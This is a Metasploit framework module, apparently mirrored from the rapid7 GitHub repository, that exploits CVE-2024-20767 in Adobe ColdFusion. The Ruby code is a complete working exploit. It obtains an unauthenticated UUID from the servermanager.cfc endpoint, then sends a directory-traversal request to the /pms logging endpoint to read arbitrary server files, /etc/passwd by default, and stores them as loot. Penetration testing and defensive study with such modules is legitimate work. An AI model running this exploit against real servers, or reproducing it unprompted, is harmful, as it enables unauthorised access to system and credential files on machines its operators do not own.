Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/gather/coldfusion_pms_servlet_file_read.rb
75665 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',

15
        'Description' => %q{

16
          This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version

17
          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication

18
          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that

19
          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.

20
        },

21
        'Author' => [

22
          'ma4ter',          # Analysis & Discovery

23
          'yoryio',          # PoC

24
          'Christiaan Beek', # Msf module

25
          'jheysel-r7'       # Msf module assistance

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          ['CVE', '2024-20767'],

30
          ['EDB', '52387'],

31
          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],

32
          ['URL', 'https://jeva.cc/2973.html'],

33


34
        ],

35
        'DisclosureDate' => '2024-03-12',

36
        'Notes' => {

37
          'Stability' => [CRASH_SAFE],

38
          'Reliability' => [],

39
          'SideEffects' => [IOC_IN_LOGS]

40
        }

41
      )

42
    )

43


44
    register_options(

45
      [

46
        Opt::RPORT(8500),

47
        OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),

48
        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),

49
        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),

50
        OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),

51
      ]

52
    )

53
  end

54


55
  def get_uuid

56
    res = send_request_cgi({

57
      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),

58
      'vars_get' =>

59
       {

60
         'method' => 'getHeartBeat'

61
       }

62
    })

63
    fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res

64


65
    # TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.

66
    fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200

67
    uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text

68
    fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/

69
    uuid

70
  end

71


72
  def run

73
    print_status('Attempting to retrieve UUID ...')

74
    uuid = get_uuid

75
    print_good("UUID found: #{uuid}")

76
    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")

77


78
    traversal_path = '../' * datastore['DEPTH']

79
    file_path = "#{traversal_path}#{datastore['FILE_PATH']}"

80


81
    res = send_request_cgi({

82
      'uri' => normalize_uri(target_uri.path, 'pms'),

83
      'vars_get' =>

84
         {

85
           'module' => 'logging',

86
           'file_name' => file_path,

87
           'number_of_lines' => datastore['NUMBER_OF_LINES']

88
         },

89
      'headers' =>

90
         {

91
           'uuid' => uuid

92
         }

93
    })

94


95
    fail_with(Failure::Unknown, 'No response received') unless res

96


97
    if res.code == 200

98
      print_good('File content received:')

99
    else

100
      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")

101
    end

102


103
    file_contents = []

104
    res.body[1..-2].split(', ').each do |html_response_line|

105
      print_status(html_response_line)

106
      file_contents << html_response_line

107
    end

108


109
    stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])

110
    print_good("Results saved to: #{stored_path}")

111
  end

112
end

113


114